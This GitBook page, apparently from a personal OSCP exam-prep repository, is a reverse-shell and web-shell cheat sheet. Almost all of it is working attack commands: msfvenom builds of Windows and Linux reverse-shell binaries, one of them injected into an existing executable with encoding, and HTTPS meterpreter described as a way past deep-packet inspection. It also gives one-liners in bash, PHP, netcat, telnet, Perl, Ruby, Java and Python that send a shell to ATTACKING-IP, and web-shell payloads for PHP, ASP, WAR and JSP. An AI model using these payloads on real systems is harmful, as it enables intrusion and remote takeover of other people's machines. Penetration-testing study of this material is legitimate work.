OSCP
  • All About OSCP
  • OSCP- One Page Repository
  • About the Author
  • Basic Linux & Windows Commands
    • Linux Commands
    • Windows
      • cmd
      • Powershell
      • Basics of windows
    • Linux / WindowsMain commands
    • Bash Scripting
  • Recon (Scanning & Enumeration)
    • Active Info Gathering
      • My Network Recon Checklist
      • My Web Recon Checklist
      • Network Enumeration
      • Port Scanning
    • Common Ports and Services
      • Other Services Enumeration
    • DNS Zone Transfer Attack
    • SNMP Enumeration
    • SMB Enumeration
    • Web Application Directory bruteforcing / fingerprinting
    • Port & Services Scanning
  • Web Application
    • My checklist
      • LFI
      • RFI
      • SQLI
    • File Upload bypass
    • Enumeration and Exploitation
    • No-Sql Injection
    • SQL Injection
    • Hidden Files and directories
    • RFI
    • LFI
  • Brute Force
    • Reuse the hash
    • Password Crack
  • Shells
    • Linux Reverse Shell [One liner]
    • Reverse Shell to fully interactive
    • Reverse Shell Cheat Sheet
    • WebShell
  • Transferring files
    • My Checklist
    • Transfer files on linux
  • Priv Escalation
    • Linux Priv Escalation
      • g0tmi1k linux privilege escalation
      • Privilege Escalation - Linux
      • Checklist - Linux Privilege Escalation
    • Windows Priv Escalation
      • Fuzzysecurity window priv escalation
      • Privilege Escalation - Windows
      • Checklist - Local Windows Privilege Escalation
  • Post Exploitation
    • Cover your tracks
    • Persistence
    • Loot Linux
    • Loot Windows
    • Escaping Restricted Shell
    • Meterpreter shell for post-exploitation
    • Spawn Shell
  • Pivoting
    • My Checklist for Pivoting
    • Tunneling and Port Forwarding
    • Pivotind understanding
  • Buffer Overflow
    • Buffer overflow
    • Buffer overflow Step by Step
      • Study about buffer overflow
      • Brainpan
      • VulnServer
      • Minishare
  • Main Tools
  • MISC
    • Exploit Compiling
  • CheatSheet (Short)
  • OSCP/ Vulnhub Practice learning
    • Machines Practice
    • My Practice on HTB Windows boxes
    • My Practice on Vulnhub boxes
    • Over the Wire (Natas)
    • Over The wire (Bandit)
Powered by GitBook
On this page
  • Reverse-shells
  • Linux
  • Binary
  • Bash
  • Php
  • Netcat
  • Reverse shell
  • With -e flag
  • Ncat
  • Telnet
  • Perl
  • Ruby
  • Python
  • Web-shells
  • PHP
  • ASP
  • WAR
  • JSP

Was this helpful?

Shells

PreviousPassword CrackNextLinux Reverse Shell [One liner]

Last updated 4 years ago

Was this helpful?

Reverse-shells

This is s great collection of different types of reverse shells and webshells. Many of the ones listed below comes from this cheat-sheet:

Windows

Meterpreter

Standard meterpreter

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Meterpreter HTTPS

It makes the meterpreter-traffic look normal. Since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections.

msfvenom -p windows/meterpreter/reverse_https LHOST=ip LPORT=443 -f exe -o met_https_reverse.exe

Non-staged payload

msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse_tcp.exe
use exploit/multi/handler
set payload windows/shell_reverse_tcp

Staged payloadi

This must be caught with metasploit. It does not work with netcat.
use exploit/multi/handler
set payload windows/shell/reverse_tcp

Inject payload into binary

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe

Linux

Binary

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f elf > shell.elf

Bash

0<&196;exec 196<>/dev/tcp/ip/80; sh <&196 >&196 2>&196
bash -i >& /dev/tcp/ip/8080 0>&1

Php

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'

Netcat

Bind shell

#Linux
nc -vlp 5555 -e /bin/bash
nc ip 5555

# Windows
nc.exe -nlvp 4444 -e cmd.exe

Reverse shell

# Linux
nc -lvp 5555
nc ip 5555 -e /bin/bash

# Windows
nc -lvp 443
nc.exe ip 443 -e cmd.exe

With -e flag

nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80

Without -e flag

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Ncat

Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is encryption. If you are on a pentestjob you might not want to communicate unencrypted.

Bind

ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
ncat -v ip 5555 --ssl

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Perl

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Web-shells

PHP

This php-shell is OS-independent. You can use it on both Linux and Windows.

msfvenom -p php/meterpreter_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f asp > shell.asp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f war > shell.war

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.jsp

https://highon.coffee/blog/reverse-shell-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet